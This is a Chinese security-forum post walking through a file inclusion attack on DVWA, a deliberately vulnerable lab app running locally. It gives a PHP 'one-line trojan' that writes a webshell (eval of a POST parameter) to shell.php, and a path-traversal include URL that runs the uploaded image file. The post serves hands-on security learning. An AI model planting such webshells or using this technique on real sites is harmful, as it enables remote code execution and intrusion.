查看: 14107|回复: 0

文件包含

[复制链接]
发表于 2019-10-17 20:41:03 | 显示全部楼层 |阅读模式
本帖最后由 bailancheng 于 2019-10-17 20:41 编辑

文件包含漏洞

PHP解析漏洞:
01.txt是一个正常的文本文件,但文件内容却是符合PHP语法的代码:
在记事本中写入下面这段代码,保存成jpg文件。
<?php
phpinfo();
?>

利用文件包含漏洞包含01.txt,其中的代码被正确执行了。
将01.txt的扩展名改为jpg、rar、doc、xxx等,都可以执行。
只要文件内容符合PHP语法规范,那么任何扩展名都可以被PHP解析
接下来开始输入一句话木马:
<?php
fwrite(fopen("shell.php","w"),’<?php eval($_POST[123]); ?>’);
?>

开始上传:
首先将级别改为最高,然后开始上传

点击上传后:

在\AppServ\www\dvwa\vulnerabilities\fi目录中生成shell.php文件,文件内容正是一句话木马。
接下来修改漏洞级别为low使用文件上传,通过文件包含漏洞执行jpg文件中的代码
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/ma.jpg
321.JPG
测试shell.php:

显示有这个目录

显示有这个目录

什么都不显示表示有这个目录,已经生成了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 15:29 , Processed in 0.030879 second(s), 10 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部